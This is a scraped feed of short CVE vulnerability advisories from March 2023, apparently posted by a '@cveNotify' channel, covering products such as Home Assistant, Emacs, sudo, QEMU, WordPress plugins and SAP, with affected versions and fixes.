🚨 CVE-2023-27482homeassistant is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered. This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.🎖@cveNotify |
|
| 2023-03-15 17:29:42 |
🚨 CVE-2023-27486xCAT is a toolkit for deployment and administration of computer clusters. In versions prior to 2.16.5 if zones are configured as a mechanism to secure clusters in XCAT, it is possible for a local root user from one node to obtain credentials to SSH to any node in any zone, except the management node of the default zone. XCAT zones are not enabled by default. Only users that use the optional zone feature are impacted. All versions of xCAT prior to xCAT 2.16.5 are vulnerable. This problem has been fixed in xCAT 2.16.5. Users making use of zones should upgrade to 2.16.5. Users unable to upgrade may mitigate the issue by disabling zones or patching the management node with the fix contained in commit `85149c37f49`.🎖@cveNotify |
|
| 2023-03-15 17:29:41 |
🚨 CVE-2023-26948onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/file/download.🎖@cveNotify |
|
| 2023-03-15 14:29:58 |
🚨 CVE-2022-48111A cross-site scripting (XSS) vulnerability in the check_login function of SIPE s.r.l WI400 between version 8 and 11 included allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the f parameter.🎖@cveNotify |
|
| 2023-03-15 14:29:57 |
🚨 CVE-2023-27986emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.🎖@cveNotify |
|
| 2023-03-15 14:29:56 |
🚨 CVE-2021-33360An issue found in Stoqey gnuplot v.0.0.3 and earlier allows attackers to execute arbitrary code via the src/index.ts, plotCallack, child_process, and/or filePath parameter(s).🎖@cveNotify |
|
| 2023-03-15 14:29:53 |
🚨 CVE-2023-27985emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to shell command injections through a crafted mailto: URI. This is related to lack of compliance with the Desktop Entry Specification.🎖@cveNotify |
|
| 2023-03-15 14:29:52 |
🚨 CVE-2023-0090The webservices in Proofpoint Enterprise Protection (PPS/POD) contain a vulnerability that allows for an anonymous user to execute remote code through 'eval injection'. Exploitation requires network access to the webservices API, but such access is a non-standard configuration. This affects all versions 8.20.0 and below.🎖@cveNotify |
|
| 2023-03-15 14:29:51 |
🚨 CVE-2023-0845Consul and Consul Enterprise allowed an authenticated user with service:write permissions to trigger a workflow that causes Consul server and client agents to crash under certain circumstances. This vulnerability was fixed in Consul 1.14.5.🎖@cveNotify |
|
| 2023-03-15 14:29:50 |
🚨 CVE-2023-0746The help page in GigaVUE-FM, when using GigaVUE-OS software version 5.0 202, does not require an authenticated user. An attacker could enforce a user into inserting malicious JavaScript code into the URI, that could lead to a Reflected Cross site Scripting.🎖@cveNotify |
|
| 2023-03-15 14:29:49 |
🚨 CVE-2023-26261In UBIKA WAAP Gateway/Cloud through 6.10, a blind XPath injection leads to an authentication bypass by stealing the session of another connected user. The fixed versions are WAAP Gateway & Cloud 6.11.0 and 6.5.6-patch15.🎖@cveNotify |
|
| 2023-03-15 14:29:45 |
🚨 CVE-2023-1291A vulnerability, which was classified as critical, was found in SourceCodester Sales Tracker Management System 1.0. This affects an unknown part of the file admin/clients/manage_client.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-15 14:29:44 |
🚨 CVE-2023-1292A vulnerability has been found in SourceCodester Sales Tracker Management System 1.0 and classified as critical. This vulnerability affects the function delete_client of the file classes/Master.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-15 14:29:43 |
🚨 CVE-2023-1286Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.19.🎖@cveNotify |
|
| 2023-03-15 14:29:39 |
🚨 CVE-2022-45155An Improper Handling of Exceptional Conditions vulnerability in obs-service-go_modules of openSUSE Factory allows attackers that can influence the call to the service to delete files and directories on the system of the victim.This issue affects:SUSE openSUSE Factoryobs-service-go_modules versions prior to 0.6.1.🎖@cveNotify |
|
| 2023-03-15 14:29:38 |
🚨 CVE-2023-0089The webutils in Proofpoint Enterprise Protection (PPS/POD) contain a vulnerability that allows an authenticated user to execute remote code through 'eval injection'. This affects all versions 8.20.0 and below.🎖@cveNotify |
|
| 2023-03-15 14:29:37 |
🚨 CVE-2023-27476OWSLib is a Python package for client programming with Open Geospatial Consortium (OGC) web service interface standards, and their related content models. OWSLib's XML parser (which supports both `lxml` and `xml.etree`) does not disable entity resolution, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase. This issue has been addressed in version 0.28.1. All users are advised to upgrade. The only known workaround is to patch the library manually. See `GHSA-8h9c-r582-mggc` for details.🎖@cveNotify |
|
| 2023-03-15 14:29:36 |
🚨 CVE-2023-25695Generation of Error Message Containing Sensitive Information vulnerability in Apache Software Foundation Apache Airflow.This issue affects Apache Airflow: before 2.5.2.🎖@cveNotify |
|
| 2023-03-15 13:29:47 |
🚨 CVE-2023-25695Generation of Error Message Containing Sensitive Information vulnerability in Apache Software Foundation Apache Airflow.This issue affects Apache Airflow: before 2.5.2.🎖@cveNotify |
|
| 2023-03-15 11:29:49 |
🚨 CVE-2023-27239Tenda AX3 V16.03.12.11 was discovered to contain a stack overflow via the shareSpeed parameter at /goform/WifiGuestSet.🎖@cveNotify |
|
| 2023-03-15 11:29:48 |
🚨 CVE-2023-27234A Cross-Site Request Forgery (CSRF) in /Sys/index.html of Jizhicms v2.4.5 allows attackers to arbitrarily make configuration changes within the application.🎖@cveNotify |
|
| 2023-03-15 11:29:47 |
🚨 CVE-2023-27235An arbitrary file upload vulnerability in the \admin\c\CommonController.php component of Jizhicms v2.4.5 allows attackers to execute arbitrary code via a crafted phtml file.🎖@cveNotify |
|
| 2023-03-15 06:30:31 |
🚨 CVE-2023-28371In Stellarium through 1.2, attackers can write to files that are typically unintended, such as ones with absolute pathnames or .. directory traversal.🎖@cveNotify |
|
| 2023-03-15 06:30:30 |
🚨 CVE-2023-27757An arbitrary file upload vulnerability in the /admin/user/uploadImg component of PerfreeBlog v3.1.1 allows attackers to execute arbitrary code via a crafted JPG file.🎖@cveNotify |
|
| 2023-03-15 06:30:27 |
🚨 CVE-2023-1338The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the attach_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify cache rules.🎖@cveNotify |
|
| 2023-03-15 06:30:25 |
🚨 CVE-2023-1339The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the uucss_update_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to update caching rules.🎖@cveNotify |
|
| 2023-03-15 06:30:23 |
🚨 CVE-2023-1335The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the ucss_connect function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to connect a new license key to the site.🎖@cveNotify |
|
| 2023-03-15 06:30:21 |
🚨 CVE-2023-1336The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the ajax_deactivate function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to disable caching.🎖@cveNotify |
|
| 2023-03-15 06:30:19 |
🚨 CVE-2023-1337The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files.🎖@cveNotify |
|
| 2023-03-15 06:30:17 |
🚨 CVE-2023-1333The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_page_cache function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete the plugin's cache.🎖@cveNotify |
|
| 2023-03-15 06:30:13 |
🚨 CVE-2023-1334The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the queue_posts function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify the plugin's cache.🎖@cveNotify |
|
| 2023-03-15 06:30:12 |
🚨 CVE-2023-1127Divide By Zero in GitHub repository vim/vim prior to 9.0.1367.🎖@cveNotify |
|
| 2023-03-15 06:30:10 |
🚨 CVE-2023-27320Sudo before 1.9.13p2 has a double free in the per-command chroot feature.🎖@cveNotify |
|
| 2023-03-15 06:30:09 |
🚨 CVE-2018-2844Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-03-15 06:30:06 |
🚨 CVE-2020-14394An infinite loop flaw was found in the USB xHCI controller emulation of QEMU while computing the length of the Transfer Request Block (TRB) Ring. This flaw allows a privileged guest user to hang the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2023-03-15 06:30:04 |
🚨 CVE-2022-1050A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device. This flaw allows a crafted guest driver to execute HW commands when shared buffers are not yet allocated, potentially leading to a use-after-free condition.🎖@cveNotify |
|
| 2023-03-15 06:30:01 |
🚨 CVE-2021-3592An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the bootp_input() function and could occur while processing a udp packet that is smaller than the size of the 'bootp_t' structure. A malicious guest could use this flaw to leak 10 bytes of uninitialized heap memory from the host. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.🎖@cveNotify |
|
| 2023-03-15 06:29:58 |
🚨 CVE-2021-3593An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp6_input() function and could occur while processing a udp packet that is smaller than the size of the 'udphdr' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.🎖@cveNotify |
|
| 2023-03-15 06:29:54 |
🚨 CVE-2021-3594An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp_input() function and could occur while processing a udp packet that is smaller than the size of the 'udphdr' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.🎖@cveNotify |
|
| 2023-03-15 06:29:52 |
🚨 CVE-2021-3595An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the tftp_input() function and could occur while processing a udp packet that is smaller than the size of the 'tftp_t' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.🎖@cveNotify |
|
| 2023-03-15 06:29:51 |
🚨 CVE-2020-29130slirp.c in libslirp through 4.3.1 has a buffer over-read because it tries to read a certain amount of header data even if that exceeds the total packet length.🎖@cveNotify |
|
| 2023-03-15 01:29:51 |
🚨 CVE-2023-1327Netgear RAX30 (AX2400), prior to version 1.0.6.74, was affected by an authentication bypass vulnerability, allowing an unauthenticated attacker to gain administrative access to the device's web management interface by resetting the admin password.🎖@cveNotify |
|
| 2023-03-14 23:30:13 |
🚨 CVE-2023-26262An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, a unrestricted language file upload vulnerability exists the can lead to direct code execution on the content management (CM) server.🎖@cveNotify |
|
| 2023-03-14 23:30:12 |
🚨 CVE-2023-26511A Hard Coded Admin Credentials issue in the Web-UI Admin Panel in Propius MachineSelector 6.6.0 and 6.6.1 allows remote attackers to gain access to the admin panel Propiusadmin.php, which allows taking control of the affected system.🎖@cveNotify |
|
| 2023-03-14 23:30:11 |
🚨 CVE-2023-27590Rizin is a UNIX-like reverse engineering framework and command-line toolset. In version 0.5.1 and prior, converting a GDB registers profile file into a Rizin register profile can result in a stack-based buffer overflow when the `name`, `type`, or `groups` fields have longer values than expected. Users opening untrusted GDB registers files (e.g. with the `drpg` or `arpg` commands) are affected by this flaw. Commit d6196703d89c84467b600ba2692534579dc25ed4 contains a patch for this issue. As a workaround, review the GDB register profiles before loading them with `drpg`/`arpg` commands.🎖@cveNotify |
|
| 2023-03-14 23:30:10 |
🚨 CVE-2023-27587ReadtoMyShoe, a web app that lets users upload articles and listen to them later, generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-14 23:30:09 |
🚨 CVE-2022-48111A cross-site scripting (XSS) vulnerability in the check_login function of SIPE s.r.l WI400 between version 8 and 11 included allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the f parameter.🎖@cveNotify |
|
| 2023-03-14 23:30:06 |
🚨 CVE-2022-4315An issue has been discovered in GitLab DAST analyzer affecting all versions starting from 2.0 before 3.0.55, which sends custom request headers with every request on the authentication page.🎖@cveNotify |
|
| 2023-03-14 23:30:05 |
🚨 CVE-2023-22890SmartBear Zephyr Enterprise through 7.15.0 allows unauthenticated users to upload large files, which could exhaust the local drive space, causing a denial of service condition.🎖@cveNotify |
|
| 2023-03-14 23:30:04 |
🚨 CVE-2023-23760A path traversal vulnerability was identified in GitHub Enterprise Server that allowed remote code execution when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to versions 3.8 and was fixed in versions 3.7.7, 3.6.10, 3.5.14, and 3.4.17. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-03-14 23:30:03 |
🚨 CVE-2021-4331The Plus Addons for Elementor plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 4.1.9 (pro) and 2.0.6 (free). The plugin adds a registration form to the Elementor page builders functionality. As part of the registration form, users can choose which role to set as the default for users upon registration. This field is not hidden for lower-level users so any user with access to the Elementor page builder, such as contributors, can set the default role to administrator. Since contributors can not publish posts, only author+ users can elevate privileges without interaction via a site administrator (to approve a post).🎖@cveNotify |
|
| 2023-03-14 23:29:59 |
🚨 CVE-2021-4333The WP Statistics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 13.1.1. This is due to missing or incorrect nonce validation on the view() function. This makes it possible for unauthenticated attackers to activate and deactivate arbitrary plugins, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-14 23:29:58 |
🚨 CVE-2023-24282An arbitrary file upload vulnerability in Poly Trio 8800 7.2.2.1094 allows attackers to execute arbitrary code via a crafted ringtone file.🎖@cveNotify |
|
| 2023-03-14 23:29:57 |
🚨 CVE-2023-28343OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.🎖@cveNotify |
|
| 2023-03-14 23:29:53 |
🚨 CVE-2021-33351Cross Site Scripting Vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before and fixed in v.1.3.7 allows attackers to escalte privileges via a crafted payload in the ticket message field.🎖@cveNotify |
|
| 2023-03-14 23:29:52 |
🚨 CVE-2021-33353Directory Traversal vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via the file attachment directory setting.🎖@cveNotify |
|
| 2023-03-14 23:29:51 |
🚨 CVE-2023-24781Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\MemberLevel.php.🎖@cveNotify |
|
| 2023-03-14 23:29:50 |
🚨 CVE-2022-4931The BackupWordPress plugin for WordPress is vulnerable to information disclosure in versions up to, and including 3.12. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.🎖@cveNotify |
|
| 2023-03-14 21:29:51 |
🚨 CVE-2023-25230loonflow r2.0.14 is vulnerable to server-side request forgery (SSRF).🎖@cveNotify |
|
| 2023-03-14 21:29:50 |
🚨 CVE-2023-25605A improper access control vulnerability in Fortinet FortiSOAR 7.3.0 - 7.3.1 allows an attacker authenticated on the administrative interface to perform unauthorized actions via crafted HTTP requests.🎖@cveNotify |
|
| 2023-03-14 18:30:01 |
🚨 CVE-2023-22847Information disclosure vulnerability exists in pg_ivm versions prior to 1.5.1. An Incrementally Maintainable Materialized View (IMMV) created by pg_ivm may reflect rows with Row-Level Security that the owner of the IMMV should not have access to. As a result, information in tables protected by Row-Level Security may be retrieved by a user who is not authorized to access it.🎖@cveNotify |
|
| 2023-03-14 18:30:00 |
🚨 CVE-2023-25363A use-after-free vulnerability in WebCore::RenderLayer::updateDescendantDependentFlags in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-03-14 18:29:59 |
🚨 CVE-2023-1278A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.🎖@cveNotify |
|
| 2023-03-14 18:29:58 |
🚨 CVE-2023-23388Windows Bluetooth Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:54 |
🚨 CVE-2023-23389Microsoft Defender Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:53 |
🚨 CVE-2023-23383Service Fabric Explorer Spoofing Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:52 |
🚨 CVE-2023-21708Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:51 |
🚨 CVE-2023-23394Client Server Run-Time Subsystem (CSRSS) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:50 |
🚨 CVE-2023-23385Windows Point-to-Point Protocol over Ethernet (PPPoE) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:46 |
🚨 CVE-2023-23392HTTP Protocol Stack Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:45 |
🚨 CVE-2023-23393Windows BrokerInfrastructure Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:44 |
🚨 CVE-2023-23397Microsoft Outlook Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:40 |
🚨 CVE-2023-23407Windows Point-to-Point Protocol over Ethernet (PPPoE) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:39 |
🚨 CVE-2023-23396Microsoft Excel Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:38 |
🚨 CVE-2023-23408Azure Apache Ambari Spoofing Vulnerability🎖@cveNotify |
|
| 2023-03-14 18:29:37 |
🚨 CVE-2023-23409Client Server Run-Time Subsystem (CSRSS) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-14 17:29:55 |
🚨 CVE-2022-41939knative.dev/func is is a client library and CLI enabling the development and deployment of Kubernetes functions. Developers using a malicious or compromised third-party buildpack could expose their registry credentials or local docker socket to a malicious `lifecycle` container. This issues has been patched in PR #1442, and is part of release 1.8.1. This issue only affects users who are using function buildpacks from third-parties; pinning the builder image to a specific content-hash with a valid `lifecycle` image will also mitigate the attack.🎖@cveNotify |
|
| 2023-03-14 17:29:54 |
🚨 CVE-2020-10749A vulnerability was found in all versions of containernetworking/plugins before version 0.8.6, that allows malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks. A malicious container can exploit this flaw by sending rogue IPv6 router advertisements to the host or other containers, to redirect traffic to the malicious container.🎖@cveNotify |
|
| 2023-03-14 17:29:53 |
🚨 CVE-2022-2837A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.🎖@cveNotify |
|
| 2023-03-14 17:29:52 |
🚨 CVE-2023-27088feiqu-opensource Background Vertical authorization vulnerability exists in IndexController.java. demo users with low permission can perform operations within the permission of the admin super administrator and can use this vulnerability to change the blacklist IP address in the system at will.🎖@cveNotify |
|
| 2023-03-14 17:29:49 |
🚨 CVE-2022-40676A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.8, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 allows attacker to execute unauthorized code or commands via specially crafted http requests.🎖@cveNotify |
|
| 2023-03-14 17:29:48 |
🚨 CVE-2022-41328A improper limitation of a pathname to a restricted directory vulnerability ('path traversal') [CWE-22] in Fortinet FortiOS version 7.2.0 through 7.2.3, 7.0.0 through 7.0.9 and before 6.4.11 allows a privileged attacker to read and write files on the underlying Linux system via crafted CLI commands.🎖@cveNotify |
|
| 2023-03-14 17:29:47 |
🚨 CVE-2022-41862In PostgreSQL, a modified, unauthenticated server can send an unterminated string during the establishment of Kerberos transport encryption. In certain conditions a server can cause a libpq client to over-read and report an error message containing uninitialized bytes.🎖@cveNotify |
|
| 2023-03-14 17:29:43 |
🚨 CVE-2023-1296HashiCorp Nomad and Nomad Enterprise 1.4.0 up to 1.5.0 did not correctly enforce deny policies applied to a workload’s variables. Fixed in 1.4.6 and 1.5.1.🎖@cveNotify |
|
| 2023-03-14 17:29:42 |
🚨 CVE-2023-1391A vulnerability, which was classified as problematic, was found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file admin/ab.php. The manipulation of the argument img leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222978 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-14 17:29:41 |
🚨 CVE-2023-1394A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been classified as critical. This affects the function mysqli_query of the file bsitemp.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222981 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-14 17:29:37 |
🚨 CVE-2023-1396A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/traveller_details.php. The manipulation of the argument address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222983.🎖@cveNotify |
|
| 2023-03-14 17:29:36 |
🚨 CVE-2023-1398A vulnerability classified as critical was found in XiaoBingBy TeaCMS 2.0. Affected by this vulnerability is an unknown functionality of the file /admin/upload. The manipulation leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-14 17:29:35 |
🚨 CVE-2023-27073A Cross-Site Request Forgery (CSRF) in Online Food Ordering System v1.0 allows attackers to change user details and credentials via a crafted POST request.🎖@cveNotify |
|
| 2023-03-14 12:29:45 |
🚨 CVE-2022-4557Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection. This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-03-14 12:29:40 |
🚨 CVE-2023-27498SAP Host Agent (SAPOSCOL) - version 7.22, allows an unauthenticated attacker with network access to a server port assigned to the SAP Start Service to submit a crafted request which results in a memory corruption error. This error can be used to reveal but not modify any technical information about the server. It can also make a particular service temporarily unavailable🎖@cveNotify |
|
| 2023-03-14 12:29:39 |
🚨 CVE-2023-27500An attacker with non-administrative authorizations can exploit a directory traversal flaw in program SAPRSBRO to over-write system files. In this attack, no data can be read but potentially critical OS files can be over-written making the system unavailable.🎖@cveNotify |
|
| 2023-03-14 12:29:38 |
🚨 CVE-2023-27501SAP NetWeaver AS for ABAP and ABAP Platform - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 791, allows an attacker to exploit insufficient validation of path information provided by users, thus exploiting a directory traversal flaw in an available service to delete system files. In this attack, no data can be read but potentially critical OS files can be deleted making the system unavailable, causing significant impact on both availability and integrity🎖@cveNotify |
|
| 2023-03-14 12:29:37 |
🚨 CVE-2023-27893An attacker authenticated as a user with a non-administrative role and a common remote execution authorization in SAP Solution Manager and ABAP managed systems (ST-PI) - versions 2088_1_700, 2008_1_710, 740, can use a vulnerable interface to execute an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user or application data and can make the application unavailable.🎖@cveNotify |
|
| 2023-03-13 06:29:57 |
🚨 CVE-2023-20626In msdc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07405223; Issue ID: ALPS07405223.🎖@cveNotify |
|
| 2023-03-13 06:29:56 |
🚨 CVE-2023-20627In pqframework, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07629585; Issue ID: ALPS07629585.🎖@cveNotify |
|
| 2023-03-13 06:29:55 |
🚨 CVE-2023-20632In usb, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628506; Issue ID: ALPS07628506.🎖@cveNotify |
|
| 2023-03-13 06:29:54 |
🚨 CVE-2023-20633In usb, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628508; Issue ID: ALPS07628508.🎖@cveNotify |
|
| 2023-03-13 06:29:50 |
🚨 CVE-2023-20636In display drm, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07292593; Issue ID: ALPS07292593.🎖@cveNotify |
|
| 2023-03-13 06:29:49 |
🚨 CVE-2023-27210Online Pizza Ordering System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/view_order.php.🎖@cveNotify |
|
| 2023-03-13 06:29:48 |
🚨 CVE-2023-27213Online Student Management System v1.0 was discovered to contain a SQL injection vulnerability via the searchdata parameter at /eduauth/student/search.php.🎖@cveNotify |
|
| 2023-03-13 06:29:44 |
🚨 CVE-2023-20637In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628588; Issue ID: ALPS07628588.🎖@cveNotify |
|
| 2023-03-13 06:29:43 |
🚨 CVE-2023-27203Best POS Management System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /billing/home.php.🎖@cveNotify |
|
| 2023-03-13 06:29:42 |
🚨 CVE-2023-27204Best POS Management System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /kruxton/manage_user.php.🎖@cveNotify |
|
| 2023-03-13 06:29:38 |
🚨 CVE-2023-27207Online Pizza Ordering System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.🎖@cveNotify |
|
| 2023-03-13 06:29:37 |
🚨 CVE-2023-27211A cross-site scripting (XSS) vulnerability in /admin/navbar.php of Online Pizza Ordering System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.🎖@cveNotify |
|
| 2023-03-13 06:29:36 |
🚨 CVE-2023-27206A cross-site scripting (XSS) vulnerability in /kruxton/navbar.php of Best POS Management System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.🎖@cveNotify |
|
| 2023-03-12 17:29:52 |
🚨 CVE-2016-15028A vulnerability was found in ICEPAY REST-API-NET 0.9. It has been declared as problematic. Affected by this vulnerability is the function RestClient of the file Classes/RestClient.cs of the component Checksum Validation. The manipulation leads to improper validation of integrity check value. The attack can be launched remotely. Upgrading to version 1.0 is able to address this issue. The name of the patch is 61f6b8758e5c971abff5f901cfa9f231052b775f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222847.🎖@cveNotify |
|
| 2023-03-12 11:29:56 |
🚨 CVE-2023-1360A vulnerability was found in SourceCodester Employee Payslip Generator with Sending Mail 1.2.0 and classified as critical. This issue affects some unknown processing of the file classes/Users.php?f=save of the component New User Creation. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222863.🎖@cveNotify |
|
